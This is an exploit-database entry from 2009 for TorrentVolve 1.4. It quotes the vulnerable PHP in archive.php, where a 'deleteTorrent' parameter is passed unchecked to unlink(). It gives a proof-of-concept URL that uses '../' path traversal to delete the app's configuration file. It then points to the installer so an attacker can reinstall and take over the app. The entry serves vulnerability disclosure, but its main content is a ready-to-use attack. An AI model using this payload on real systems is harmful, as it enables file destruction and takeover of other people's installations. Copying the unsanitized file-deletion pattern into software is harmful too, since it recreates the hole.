TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability

2009-06-11T00:00:00
ID 1337DAY-ID-5352
Type zdt
Reporter Br0ly
Modified 2009-06-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability
====================================================================


----------------------------------------------------------------------------------------------------

  Name : Torrent Volve
  Site : http://sourceforge.net/projects/torrentvolve/
  Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030

----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Delete Arbitrary file.
     
  Look this in: archive.php; Lines 194 - 199

  if(isset($_GET['deleteTorrent'])) {

                //delete Torrent from file system
                unlink($userDir . '/' . $_GET['deleteTorrent']);
                echo '  <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
        }
 
  Then after login we can delete files, if you delete the configuration file you can install the script again.
 

----------------------------------------------------------------------------------------------------

  P0c:
 
    http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml

  To install again go to:

    http://localhost/Scripts/torrentvolve/
   

  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------




#  0day.today [2018-04-10]  #